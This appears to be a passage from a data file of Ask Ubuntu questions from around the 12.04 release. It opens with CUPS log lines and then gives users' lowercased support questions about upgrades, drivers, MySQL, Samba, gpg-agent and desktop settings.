/printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:45:19 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok == > /var/log/cups/error_log < == i [ 28/apr/2012:12:45:19 -0500 ] cupsdcloseclient : ssl shutdown successful ! == > /var/log/cups/access_log < == 10.0.0.170 - - [ 28/apr/2012:12:45:22 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 654 get-printer-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:45:22 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:45:24 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok == > /var/log/cups/error_log < == i [ 28/apr/2012:12:45:24 -0500 ] cupsdcloseclient : ssl shutdown successful ! == > /var/log/cups/access_log < == 10.0.0.170 - - [ 28/apr/2012:12:45:30 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 654 get-printer-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:45:30 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:45:31 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 654 get-printer-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:45:31 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:45:32 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:45:32 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 654 get-printer-attributes successful-ok == > /var/log/cups/error_log < == i [ 28/apr/2012:12:45:32 -0500 ] cupsdcloseclient : ssl shutdown successful ! i [ 28/apr/2012:12:45:32 -0500 ] [ job 91 ] adding end banner page `` none '' . e [ 28/apr/2012:12:45:32 -0500 ] [ job 91 ] no files , canceling job ! i [ 28/apr/2012:12:45:32 -0500 ] cupsdcloseclient : ssl shutdown successful !
127156	12.04 upgrade from 11.10 stuck at restoring previously installed packages	i am trying to upgrade from 11.10 to 12.04 . the machine is acer aspire core i3 , 2.1ghz , ram 6gb , hard disk 500 gigabyte . i am using a usb stick with a downloaded 12.04 live install . the install progressed with an overwrite of 11.10 system files to 12.04 and then got stuck . the install is stuck at 'restoring previously installed packages' how can i recover from this situation ? please help . ragv
127160	how long is 11.10 supported ?	im kinda noob here , but question until when is the support for ubuntu 11.10 , i just update my pc to 12.04 but , when i install the video driver , nothing show on the desktop even can not open terminal , just the screen properties so i want to down grade , and i need to know when will be the last support for this 11.10 do that makes sense ?
127162	will photoshop work on ubuntu ?	i was using windows xp , i like ubuntu , but i 'm wondering , because as i 'm a professional photographer & photo editor . i do my work with photoshop , so will photoshop work in ubuntu ?
127166	is a 10.04 lts to 12.04 release upgrade possible ?	i have a beloved high performance 10.04 lts 64 bit workstation , where i do serious work . i am considering doing a release upgrade to 12.04 lts early . it seems that 10.04 lts is not fully supported as i have to manually instal a nvidia driver , the nvidia-current not supporting my year old video adapter . it was my understanding that an lts to lts upgrade is considered a release up grade , but it is not shown on update manager as `` release upgrade available '' . is a 10.04 lts to 12.04 release upgrade possible ? and can i use the update manager ?
127167	how do i enable scroll lock ?	i need to enable scroll lock so i can toggle lights on my keyboard . this works on arch.funny thing it does n't work on ubuntu . http : //linuxtechie.wordpress.com/2008/04/07/getting-scroll-lock-to-work-in-ubuntu/ $ xmodmap -e ‘add mod3 = scroll_lock’ xmodmap : unknown command on line commandline:1 xmodmap : unable to open file 'mod3 ' for reading xmodmap : unable to open file '= ' for reading xmodmap : unable to open file 'scroll_lock’ ' for reading xmodmap : 4 errors encountered , aborting .
127168	after upgrading to 12.04 , my screen resolution is small	i just upgraded ubuntu to 12.04 from 11.10 . my screen resolution is now stuck at 640x480 , and xrandr shows : screen 0 : minimum 320 x 200 , current 640 x 480 , maximum 8192 x 8192 dvi-i-1 connected 640x480+0+0 ( normal left inverted right x axis y axis ) 376mm x 301mm 640x480 60.0* 720x400 70.1 i normally have a much higher screen resolution . i have an nvidia video card , and i had the restricted drivers installed before the upgrade . when i attempt to install additional drivers , i see this dialog , which does n't seem right : also when i type `` jockey-text -- list '' , i get nothing . what might have gone wrong , and how i fix it ?
127170	why is the dash so unresponsive , and is there a way to fix this ?	i just upgraded to 12.04 . when i press the super key to open the dash , there 's a lag of 1-3 seconds before it displays , with no other programs running . ( this is similar , but not identical , to the issue described in dash application search unresponsive at startup about 11.10 . ) at login time , this lag is up to 10 seconds , and sometimes the dash does n't respond at all to the super key . in contrast , the launcher kupfer immediately responds to its hotkey , in milliseconds , and responds to my typing an application name also in fractions of a second . is there a way to load the dash in memory or a ram disk of some sort to make it more responsive ?
127174	can not set custom shortcut using can-change-accels in nautilus	just upgraded to ubuntu 12.04 and enabled in dconf - > org- > gnome- > desktop- > interface and enabled can-change-accels . but it does n't seem to work . it is the option to set a custom shorcut for actions in the menu ) . is it due to the presence of the global menu ? how to solve ?
127176	are multiple displays , gnome panel applets and the desktop cube , rotate cube and 3d windows available in 12.04 ?	i have a beloved high performance 10.04 lts 64 bit workstation , where i do serious work . i am considering doing a release upgrade to 12.04 lts early . it seems that 10.04 lts is not fully supported as i have to manually install a nvidia driver , the nvidia-current not supporting my year old video adaptor . i make heavy use of multiple displays , gnome panel applets and the desktop cube , rotate cube and 3d windows in the way i work . i find unity obstructive to my style of working , are these features available after upgrading to 12.04 lts ?
127180	12.04 boots to blackscreen on acer aspire one 751h	just installed ubuntu 12.04 , but when i 'm trying to boot desktop in normal mode screen turns black , just black ( like turned off ) , but when i 'm trying to boot in secure mode top half of screen start twitch and flick , bottom is black . how can i solve this problem ? netbook acer aspire one 751h | intel gma500
127182	installer only recognizes 801gb of a 3tb raid1 array	i 've been searching as best i can for this precise problem , but the only place i found it exactly was here , and i do n't think that the op ever got an adequate answer . most of the issues i 've seen with regards to 3tb hard drives stem from outdated hardware , dual-booting issues , etc . my server is brand-new , using an asrock h67m-itx with onboard intel raid . i have two seagate 3tb set up in a raid 1 array . everything i can see in the raid controller indicates that the motherboard is having no problems with this arrangement : both disks show up as 3tb devices , and the raid array does as well . the only point at which anything goes amiss is upon loading 12.04-desktop-amd64 from a flash drive , and attempting to partition . at this stage , i create a new partition table on the disk , and the resulting size is 801567 mb . i was under the impression that the motherboard had no problems with raid arrays this large , and also that the latest long-term stable release of 64-bit ubuntu shipped with in-kernel gpt support and would have no difficulties as well . any ideas on what i 'm doing wrong ?
127184	can not install ati/amd graphics through wubi on macbook pro	i am running ubuntu 12.04 through wubi on my windows dual boot on a late 2011 macbook pro . everything seems to be in working order , except when i try to install the ati/amd graphics drivers ; it fails and directs me to view /var/log/jockey.log . how do i fix this ?
127190	how to setup wired network connection in ubuntu ?	i just installed ubuntu , i cant get that how to set network connection , i do n't have lancard driver for ubuntu , help plz
127194	is there program that can do a dual screen random slideshow ?	i 've got a dual screen set up on my ubuntu machine and i 'd quite like to set it up to do a random slideshow , with different images on each screen . is it possible to do this with one or more programs ?
127195	is there a command line music client ?	i want a command line music player which can play all formats including mp3 , ogg . also i want it should have the features like pause , play , stop . that means basic music player is enough for me . is there anything available for ubuntu ?
127198	will the aptitude/multiarch bug allow a successful upgrade from 10.04 lts to 12.04lts on a 64bit workstation ?	the release notes say in known issues `` aptitude does not work on 64-bit systems without disabling multiarch in /etc/dpkg/dpkg.cfg.d/multiarch . ( 831768 ) '' is this going to fail my i386 stuff in my amd64 10.04 lts to 12.04 lts release upgrade ?
127200	upgrading system to 12.04 using cd did not preserve my users - how 's best to restore them ?	today i upgraded from 10.04 to 12.04 ( via 11.10 first ) . i performed both of these upgrades using the cds as this was on a system with a very bad internet connection ( and in fact the network connection was non-existent when i did the upgrades ) . everything seemingly went fine , except for one quite important aspect : my original ( 10.04 ) users have not been preserved . however the files are still there in /home/xxx , so at least there 's no concern about any data loss . i had two users in my original setup : an admin user that used unity , and my main user ( non-admin ) that used gnome classic . ( i realise this may well be irrelevant . ) during both of the upgrades i performed today i was asked `` who are you ? '' and prompted to enter my name , username , new password , etc . this is where i first got suspicious , so on both of these occasions i created an entirely new user . on the initial upgrade ( 10.04 to 11.10 ) there was no mention of the possibility of importing old users at all . then on the second upgrade ( 11.10 to 12.04 ) an `` import user '' ( or similar ) screen appeared after the `` who are you ? '' screen , but it was accompanied by a message saying there were no suitable users found that could be imported . so ... my question at last : what is the best way to resurrect my old users ? is there an import tool i can use ? should i just create a new user with the same name and see what happens ? should i create a new user with a different name and copy the old user over it in its entirety ? or should i create a new user and just copy across the old data piece-by-piece as-and-when it 's needed ? one last note : i do have a deja dup backup of the users on my nas , and i 'm currently creating a tar archive of them too ( although the tar will obviously be from post-upgrades ) . any help or advice would be much appreciated ! thanks , thoughton .
127203	randomly being logged out after fresh install of 12.04	just did a new install of 12.04 last night and playing around it this morning i notice i am being logged out at random times . so far its happened twice in the last half hour and the only thing i was running at the time was chromium . any ideas what could be causing this ?
127209	will 12.04 's network manager work on my lenovo s12 , it does n't in 11.10 ?	network manager does not work on my lenovo ideapad s12 ( intel atom ) laptop . i had to replace network manager to use a network . will the 12.04 upgrade keep wicd or will network manger now work ?
127210	thinkorswim crash in 12.04	thinkorswim , a options trading application , continues to crash in ubuntu . i know it is very sensitive to the java used . i am using the openjdk 7 java in ubuntu 12.04 . any help would be highly appreciated . thanks ! !
127212	odd red pixels appear all over screen	when attempting to boot ubuntu/xubuntu/etc from a livecd , my screen displays `` color scrambled '' random pixels for a few seconds after the loading screen with the 5 dots , and then turns completely black with a few scattered red pixels . the os continues to load and operate , but the red pixels continue to be displayed . they occasionally move around and flicker , a few trailing the mouse , but never dissipate . at first i thought it was just a quirk with booting from the cd , but after installing it alongside windows 7 it still always boots with these red pixels . i 've never had this occur before on windows 7 , so i 'm sort of at a loss on what the issue is . any advice on fixing the problem or providing more info would be much appreciated .
127213	files/e-mail not signed with kleopatra/kmail . gpg-agent	important edit : the things almost work right know ( i had put to open as a new session on system setings and reboot the computer ) . when i tried to sign and encript a file with kleopatra the pinentry appeared , but , disappeared before i input anything . so , i think solving this , everything will work . appreciate help , thx . the question i 'm problem with signing messages on kleopatra and kmail . when i try sign files/e-mails i got a error : bad passphrase . appreciate helps , thanks . my sistem is : ubuntu 12.04 lts \n \l linux tevatron 3.2.0-24-generic # 37-ubuntu smp wed apr 25 08:43:22 utc 2012 x86_64 x86_64 x86_64 gnu/linux kde : 4.8.2 kleopatra : statup timing : 0 ms elapsed : command line args created qt : 4.8.1 plataforma de desenvolvimento kde : 4.8.2 ( 4.8.2 ) kleopatra : 2.1.1 kmail : qt : 4.8.1 plataforma de desenvolvimento kde : 4.8.2 ( 4.8.2 ) kmail : 4.8.2 gpg-agent : gpg-agent ( gnupg ) 2.0.17 libgcrypt 1.5.0 copyright ( c ) 2011 free software foundation , inc. license gplv3+ : gnu gpl version 3 or later http : //gnu.org/licenses/gpl.html this is free software : you are free to change and redistribute it . there is no warranty , to the extent permitted by law . gpg : copyright ( c ) 2010 free software foundation , inc. license gplv3+ : gnu gpl version 3 or later http : //gnu.org/licenses/gpl.html this is free software : you are free to change and redistribute it . there is no warranty , to the extent permitted by law . home : ~/.gnupg algoritmos suportados : chave p炭blica : rsa , rsa-e , rsa-s , elg-e , dsa criptografia : 3des , cast5 , blowfish , aes , aes192 , aes256 , twofish , camellia128 , camellia192 , camellia256 dispers達o ( hash ) : md5 , sha1 , ripemd160 , sha256 , sha384 , sha512 , sha224 compress達o : n達o comprimido , zip , zlib , bzip2 i tried create a file in ~/.kde/env named gpg-agent.sh and did it as executable . the content is : # ! /bin/bash eval $ ( gpg-agent -- daemon -- pinentry-program /usr/bin/pinentry-qt4 ) created a file in ~/.kde/shutdown name gpg-agent.sh too and did it as executable too . the content is : # ! /bin/sh # the second field of the gpg_agent_info variable is the # process id of the gpg-agent active in the current session # so we 'll just kill that , rather than all of them [ -n `` $ { gpg_agent_info } '' ] & & kill $ ( echo `` $ { gpg_agent_info } '' | cut -d ' : ' -f 2 ) created the file ~/.gnupg/gpg.conf with the content : # gnupg config file created by kgpg default-key < my key id > keyserver-options auto-key-retrieve use-agent where < my key id > is the id of my key and i ommited . i have pinentry-qt4 installed . appreciate the helps , thx .
127217	how can i set and get the tty console font ?	1.how can i set the font and size of the ttys ? the command : dpkg-reconfigure console-setup allows me to choose certain fonts/sizes that can not be installed ( an error message appears after the reconfig . process ) . moreover , the values set in /etc/default/grub alter everything . sometimes you are using a font , but after rebooting it is changed . 2.how can i know what font/size is the console using in a certain moment . there is a how to in the community pages to set the tty resolution but it has no description of its interaction with the font/size of the console during boot and after .
127218	desktop does n't load after install nvidia drivers	when i load ubuntu 12.04 , it logs in with slight flickering , and proceeds to the desktop . with no unity . or icons . i can right-click but that 's all . this started since i installed the restricted driver for my nvidia card .
127220	how do i launch vuze ?	i am new to ubuntu . i went to the software center in ubuntu 12.04 and installed vuze . but i can not find a way to run the program . i installed vlc and k3b and there is an icon for them on the left side of the screen . they work fine , but i can not figure out how to run vuze . any help would really be appreciated .
127222	asus x53s intel graphics and unity 3d	i just bought a asus x53s . everything works flawlessly except that i ca n't run unity 3d on it because nvidia linux drivers currently does n't support optimus . so i 'm stuck with the other integrated intel graphics adapter . i 'm already installed bumblebee but it does n't help with unity 3d thing . will the xorg driver ever support opengl and especially glx_texture_from_pixmap so that unity 3d will work with it ? the intel driver is really snappy with unity 2d and seems to support most other x acceleration features such as smooth scrolling .
127223	network authentication not working	i just installed ubuntu 12.04 and im trying to connect it to my nas . it connects fine to folders where there are not authentication needed . however , if i try to open a password protected folder it does not connect . i use ubuntu from long time ago , since 2008 , as my sole operating system for all my pcs and all other ubuntu installations ( lucid and karmic ) works good with this nas ( dlink dns-323 ) always . its just this new install for 12.04 which is not working . for reference , i found these links with issues very similar to mine : links : 12.04 - ca n't connect to network shares http : //www.ubuntuforums.org/showthread.php ? p=11842051 ca n't authenticate 12.04 to active directory share http : //www.linux-archive.org/ubuntu-user/660199-cant-authenticate-12-04-active-directory-share.html ca n't access our buffalo network attached storage device http : //www.askubuntu.com/questions/126588/cant-access-our-buffalo-network-attached-storage-device this is my /etc/samba/smb.conf file : [ global ] netbios name = pc4 client lanman auth = yes server string = samba file and print server workgroup = pc security = share guest ok = yes remote announce = 192.168.1.255 remote browse sync = 192.168.1.255 log file = /var/log/samba/samba.log max log size = 1000 encrypt passwords = yes unix password sync = yes socket options = so_keepalive so_broadcast tcp_nodelay local master = no domain master = no os level = 33 name resolve order = bcast wins lmhosts dns proxy = no update encrypted = yes hostname lookups = yes passwd program = /usr/bin/passwd ' % u' passwd chat = *new*password* % n\n *retype*new*password* % n\n *passwd*changed*\n i tried different things long before typing this message : install pcman file manger as alternative to nautilus . result = it didnt connect either . install other desktop environments as alternative to unity : lxde , xfce , gnome session fallback , gnome desktop . result : none of them worked for my authentication issue . tried to use the default smb.conf file . result : it did not work . tried to update gvfs and componets because i read this bug : regression : nautilus not mounting network share in ~/.gvfs https : //bugs.launchpad.net/ubuntu/+source/gvfs/+bug/945399 but after upgrading to gvfs version 1.12.1 i still have the same issue . result = it did not work either . tried to update keyring and components by using synaptic . result : same problem . i also updated all operating system with `` update manager '' up to today ( april 28 , 2012 ) after spending a lot of hours i decided to give up and ask for some help . the only thing that did work was this command : $ sudo mount -t smbfs -o username=nasuser , password=****** //192.168.1.100/volume_1 ~/desktop/mountedfolder` but thats not the way im looking for . please advise .
127228	how do i disable local dns caching ?	i have a small private lan with 6 ubuntu systems . to improve performance and simplify maintenance i implemented a dns server on my debian firewall/router ( dig shows 0ms on repeat lookups ) . will i be able to disable the new local dns cache on my ubuntu systems during or after the release-upgrade ? reference : https : //wiki.ubuntu.com/precisepangolin/releasenotes/ubuntudesktop http : //www.stgraber.org/2012/02/24/dns-in-ubuntu-12-04/
127231	qmake error when trying to build qwbfs	i 'm trying to install qwbfs application but when i enter the command : make i get this : tools.c:8:25 : fatal error : openssl/md5.h : no such file or directory compilation terminated . make [ 1 ] : *** [ ../build/release/obj/unix/tools.o ] error 1 make [ 1 ] : leaving directory `/home/speedox/qwbfsmanager-1.2.2-src/libwbfs' make : *** [ sub-libwbfs-make_default-ordered ] error 2 can you please tell me where is the problem . thanks in advance ,
127235	gnome-terminal does n't start	gnome-terminal does n't start when i click it from the dash . when i open x-term and try to start it from there , i get '' floating point exception ( core-dumped ) '' . but i could start gnome-terminal as root . so what 's going on ? and how do i fix it ?
127240	missing launcher after 12.04 upgrade	i recently upgraded to ubuntu 12.04 and after doing some updates and such my application launcher and title bars ( for window dialogues ) are missing . basically the entire unity gui is missing ! not sure what happened so i installed gnome 3 and it was missing a launcher too , but did have title bars . in addition the bar found at the top that lets you know what 's open and allows gnome extensions to be displayed is not interactive . i ca n't click , right click , alt + click ( right or left ) , alt + super click ( right or left ) anywhere ! i even installed an application menu from the gnome site and it is not interactive either . however , since there is no way to launch applications i have to use terminal and if i minimize an app it will disappear completely . then i decided to try unity 2d and it is incredibly messed up . black background , launcher is there but icons and top bar while on desktop are completely distorted . they 're not just pixelated ; they 're all sorts of funky colors and when i open something from unity 2d launcher it will show it 's opened in the launcher but nothing appears on my screen . when trying to view videos on youtube the video is distorted and looks just as unity 2d does . strange enough : the audio works fine , just not videos . pictures loads , but not ads that stream video . any suggestions to get my launcher and the unity gui back ? i tried reinstalling gnome , unity 3d , and unity 2d from terminal . no change . also reinstalled unity desktop and tried resetting it : nothing happened .
127242	touchpad not working on vaio vgn-tz170n	i just installed ubuntu 12.04 on my vaio vgn-tz170n and the touchpad is n't working . tried an external usb mouse and that is n't working either . any ideas ? thanks !
127243	ca n't stay connected to wi-fi	just upgraded to 12.04 this morning and all of a sudden it wo n't stay connected to my home wi-fi . it connects , and then about 15 seconds later it disconnects and asks to enter the password again . however , it connects to my phone 's hotspot . i have two phones , a blackberry bold and a galaxy nexus and when i set either one of them to hotspot , my computer will connect and it stays connected , but it will not stay connected to my home wifi . any ideas ?
127251	ubuntu hotspot not detected by iphone 4	i had window 7 installed on my hp g62 and i recently moved to ubuntu 11.10. i used to share my internet connection to my iphone using connectify since i only have wired connection in the student apartments . i tried to set up a new hotspot using ubuntu , but the problem is that the iphone is not even detecting that there is a hotspot . is there anyway to fix this ? ? thank you..
127253	suspend and resume not working on an hp dv7	this one is driving me nuts . my hp dv7 laptop is n't resuming from suspend and hybernate . on suspend - resume it leaves me with a black screen . on hibernate it succesfully loads the images and then it hangs ... . i searched through internet and tried serveral things , but nothing seems to work for this hp dv7 on ubuntu 12.04 . with 11.10 it did n't work either . intel® core™ i5 cpu m 450 @ 2.40ghz × 4 vesa : intel®ironlake mobile graphics 64-bit
127256	failed to install bootloader	i am trying to install ubuntu 12.04 by creating a usb boot disk . i am using a 500 gb external hard-drive ( `` elements '' ) . i get through the first part of using the start-up disk creator . i select ubuntu 12.04 `` precise pangolin '' as the iso , and my external hard-drive , which has 150 gb free , as the disc to use . i hit `` make startup disc '' . it asks me for authentication before i can copy files , and that part works . then after copying files , it asks for authentication again to install the boot loader . at this point , it immediately says `` failed to install the bootloader . '' any idea why i am having a problem ?
127257	is multiple mysqld processes for 1 mysql server is normal ?	i 'm not an server administrator , but i would like to know why on the server i have like 10 myslq instances ? is it good or bad ? does it negatively impact speed of my website ? here 's screenshot : thanks .
127263	alt-tab behaviour in kde 4.8.2 after upgrade to 12.04	this may be a silly question for this community ( and if this question does not belong here , please let know , and i 'll either delete it or move to another suggested forum . ) i run kubuntu , and i just upgraded from 11.10 to 12.04 ( precise ) . i am not sure which version of kde i was running in 11.10 , but i did n't really do anything except install recommended upgrades on my machine since i installed 11.10 . my question is about the alt-tab behavior in the ( new ? ) version of kde that came with 12.04 . previously when i pressed alt-tab , a grid of small icons corresponding to the windows i had open on the desktop i was currently on was displayed , with the window in focus highlighted . now i get just one row of large icons on a fat `` tape '' with about 5 and a half of them fitting on the screen at a time ( and i 've got a 1920x1080 pixel screen ! ) , the rest being invisible off the screen . i usually have more than 5 windows open , and i would like to be able to see the icons for the whole set of them . however , i have not been able to do this . i 've been to system settings- > window behavior- > task switcher- > main tab and played around with that to no avail . is there another place i can look ? thank you for any help !
127264	ca n't start mysql - mysql respawning too fast , stopped	today i did a fresh install of ubuntu 12.04 and went about setting up my local development environment . i installed mysql and edited /etc/mysql/my.cnf to optimise innodb but when i try to restart mysql , it fails with a error : [ 20:53 ] [ tom @ pochama : /var/www/website ] ( master ) $ sudo service mysql restart start : job failed to start the syslog reveals there is a problem with the init script : > tail -f /var/log/syslog apr 28 21:17:46 pochama kernel : [ 11840.884524 ] type=1400 audit ( 1335644266.033:184 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/mysqld '' pid=760 comm= '' apparmor_parser '' apr 28 21:17:47 pochama kernel : [ 11842.603773 ] init : mysql main process ( 764 ) terminated with status 7 apr 28 21:17:47 pochama kernel : [ 11842.603841 ] init : mysql main process ended , respawning apr 28 21:17:48 pochama kernel : [ 11842.932462 ] init : mysql post-start process ( 765 ) terminated with status 1 apr 28 21:17:48 pochama kernel : [ 11842.950393 ] type=1400 audit ( 1335644268.101:185 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/mysqld '' pid=811 comm= '' apparmor_parser '' apr 28 21:17:49 pochama kernel : [ 11844.656598 ] init : mysql main process ( 815 ) terminated with status 7 apr 28 21:17:49 pochama kernel : [ 11844.656665 ] init : mysql main process ended , respawning apr 28 21:17:50 pochama kernel : [ 11845.004435 ] init : mysql post-start process ( 816 ) terminated with status 1 apr 28 21:17:50 pochama kernel : [ 11845.021777 ] type=1400 audit ( 1335644270.173:186 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/mysqld '' pid=865 comm= '' apparmor_parser '' apr 28 21:17:51 pochama kernel : [ 11846.721982 ] init : mysql main process ( 871 ) terminated with status 7 apr 28 21:17:51 pochama kernel : [ 11846.722001 ] init : mysql respawning too fast , stopped any ideas ? things i tried already : i googled and found a ubuntu bug with apparmor ( https : //bugs.launchpad.net/ubuntu/+source/mysql-5.5/+bug/970366 ) , i changed apparmor from enforce mode to complain mode : sudo apt-get install apparmor-utils sudo aa-complain /usr/sbin/mysqld sudo /etc/init.d/apparmor reload but it did n't help . i still ca n't start mysql . i also thought the issue may be because the innodb logfiles were a different size than mysql was expecting . i removed the innodb log files before restarting using : sudo mv /var/lib/mysql/ib_logfile* /tmp . no luck though . workaround : i re-installed 12.04 , made sure not to touch /etc/mysql/my.cnf in any way . mysql is working so i can get on with what i need to do . but i will need to edit it at some point - hopefully i 'll have figured out a solution , or this question will have been answered by that point ...
127265	is it possible that dual booting could destroy my hard drive ?	i noticed that any time i install ubuntu 11.10 or 12.04 alongside my windows 7 os , the windows partition runs very slowly and the hard drive always seems busy in windows 7 . i have had a hard drive completely fail in the past -- could the dual booting be the problem ?
127269	am i using all the power of my pc in ubuntu ? how can i find this out ?	my computer has a cpu with 4 cores and 4gb ram . what i want is to find out , if i am using all the available power that my pc offers to me ? how can i do this ?
127272	rhythmbox 's not playing music from network share	rhythmbox 's not playing music from network share . when you move seekbar , you can hear sound for half a second though , but then it stops . plays music just fine from mounted drives . also tested with banshee and vlc player : both played files with no problems . system : clean-installed 12.04
127276	gvim has too much space between characters	i installed ubuntu 12.04 lts yesterday , and did n't change any system setting , but gvim ca n't get correct font display , there 's too much space between character . screeshot : http : //i.imgur.com/rm9hf.png the .gvimrc file : http : //i.imgur.com/lngny.png
127282	after upgrade to 12.04 , hanging in login screen	writing this from an older dell notebook , ugpraded to 12.04 32-bit , which works well . my more modern dell notebook worked well for 1/2 day after upgrading to 12.04 64-bit , now i 'm having problems logging in : system boots normally , ( unity ) can enter my password , the login-screen reports 'logging in ... . ' , but that 's the end , wo n't log in even after 30 minutes - it just stays on the login screen . same for guest login . console log in works well and quick . checked xorg.0.log.old , but did n't see an error message . the user : group for my home directory is correct . an fsck did n't find any errors . will need to find out how to mount an usb stick from command line , sure you 'll want me to upload log files ... thanks tino
127284	command to launch an application or to show its window if already launched	i want to create a shorcut to 1 ) launch an application if it has not been launched yet , and 2 ) to show ( or to bring to the front ) the window of the app if it has already been launched . for example : f10 for launching stardict . i created a custom shorcut with the command `` stardict '' and the key f10 , so each time i press f10 , the system launch a new instance of stardict , but this is not what i want . can anybody help please ? thank you in advance . update : in addition , i want to add something like : if the window is already shown , a press on the shortcut key ( always the same ) will minimize it to the system tray . many thanks to desgua for his complete solution below ( answer section ) . by the way , before desgua posted his solution , i had found another solution , but not tested : http : //ubuntuforums.org/showthread.php ? t=1464311
127286	caps lock indicator does not work in kubuntu 12.04 w/ plasma workspace	can anyone please tell how to enable the caps lock indicator in kubuntu 12.04 ... i tried installing indicator-keylock app but it says it no longer exists in the repository.. is there an in built indicator for ubuntu ? if so how to enable the same . thanks in advance for your kind answer .
127290	setting program logo in unity launcher - missing icons folder	my goal is to create a working launcher for phpstorm which will work in both the desktop and the unity launcher , using the proper logo , in 12.04 . i followed the instructions here - how can i create launchers on my desktop ? - to create a launcher on the desktop using the gnome dialog box . that worked a treat as far as the desktop was concerned , but dragging the icon to the unity launcher gave it a weird icon : the phpstorm.desktop file looks like this : # ! /usr/bin/env xdg-open [ desktop entry ] version=1.0 type=application terminal=false icon [ en_gb ] =gnome-panel-launcher name [ en_gb ] =phpstorm exec=/home/shane/software/phpstorm-4.0.1/bin/phpstorm.sh comment [ en_gb ] =phstorm name=phpstorm comment=phstorm icon=/home/shane/software/phpstorm-4.0.1/bin/webide.png next i tried to follow the accepted answer from here : how can i change the icon of an application in the unity launcher ? , but i found that there was no icons folder in ~/.local/share/ . i went ahead and created it , and the rest of the folders mentioned in the answer , ~/.local/share/icons/hicolor/16x16/ etc . i then created a phpstorm.png in each folder , at the required sizes . next , i edited my phpstorm.desktop file to the following and copied it to ~/.local/share/applications/ # ! /usr/bin/env xdg-open [ desktop entry ] version=1.0 type=application terminal=false icon [ en_gb ] =phpstorm name [ en_gb ] =phpstorm exec=/home/shane/software/phpstorm-4.0.1/bin/phpstorm.sh comment [ en_gb ] =phpstorm name=phpstorm comment=phpstorm icon=phpstorm # icon=/home/shane/software/phpstorm-4.0.1/bin/webide.png after logging back in , my unity launcher icon had disappeared completely , and the icon on my desktop had turned white . what have i done wrong here ? why are n't the icons being picked up from the icons folder , and is the initial lack of icons folder something i should be concerned about ?
127291	ubuntu 12.04 wo n't install	i have a problem i have had before . when i create a usb drive to install ubuntu 12.04 using startup disk creator , it wo n't work . it does n't give me any errors , but when i restart the pc to boot into the usb drive ( settings are correct in bios ) , i get the option to : 1 ) try live cd 2 ) install ubuntu 12.04 3 ) check the disk i choose option 2 and after that , nothing happens , just black screen no matter how long i wait . i tried creating the usb using unetbootin , on both ubuntu 11.10 and windows 7 , but same issue . i have had this problem installing ubuntu 11.10 too , but it was solved by creating the usb drive in linux mint . but i do n't have mint installed now , so i hope someone knows what the problem could be . thanks in advance !
127292	unity wo n't install ( held back packages ) on 12.04	i 'm trying to install unity , but held back packages are preventing me from doing it . here it is : castillobg @ castillobg-xps-l501x : ~ $ sudo apt-get install unity leyendo lista de paquetes ... hecho creando árbol de dependencias leyendo la información de estado ... hecho no se pudieron instalar algunos paquetes . esto puede significar que usted pidió una situación imposible o , si está usando la distribución inestable , que algunos paquetes necesarios no han sido creados o han sido movidos fuera de incoming . la siguiente información puede ayudar a resolver la situación : los siguientes paquetes tienen dependencias incumplidas : libxfixes3 : rompe : unity ( < 5.6.0-0ubuntu2 ) pero 4.24.0-0ubuntu3 va a ser instalado unity : depende : libbamf3-0 ( > = 0.2.60 ) pero no va a instalarse depende : libglew1.5 ( > = 1.5.7.is.1.5.2 ) pero no va a instalarse depende : libgnome-desktop-3-2 ( > = 2.91.5 ) pero no va a instalarse depende : libgtk-3-0 ( > = 3.1.6 ) pero no va a instalarse depende : libindicator3-6 pero no va a instalarse depende : libnux-1.0-0 ( > = 1.8.0-0 ) pero no va a instalarse depende : libunity-core-4.0-4 ( > = 4.14.2 ) pero no va a instalarse depende : libunity-misc4 ( > = 4.0.4 ) pero no va a instalarse depende : unity-common ( = 4.24.0-0ubuntu3 ) pero 5.10.0-0ubuntu6 va a ser instalado depende : compiz pero no va a instalarse depende : compiz-core pero no va a instalarse depende : compiz-core-abiversion-20110828 depende : compiz-plugins-main-default pero no va a instalarse depende : nux-tools pero no va a instalarse depende : unity-asset-pool ( > = 0.8.18 ) pero no va a instalarse recomienda : indicator-appmenu pero no va a instalarse recomienda : indicator-application pero no va a instalarse recomienda : indicator-sound pero no va a instalarse recomienda : indicator-datetime pero no va a instalarse recomienda : indicator-messages pero no va a instalarse recomienda : indicator-power pero no va a instalarse recomienda : indicator-session pero no va a instalarse e : error , pkgproblemresolver : :resolve generó cortes , esto puede haber sido causado por paquetes retenidos . does anyone know how to fix this ? any help would be pretty much appreciated .
127298	12.04 right click menu theme bug	just upgraded from 11.10 to 12.04 . i noticed that right menu dropdown list does not have the default window ambiance theme . the menu background is white and text dark but ambiance theme is background black and tect white . is it a bug ?
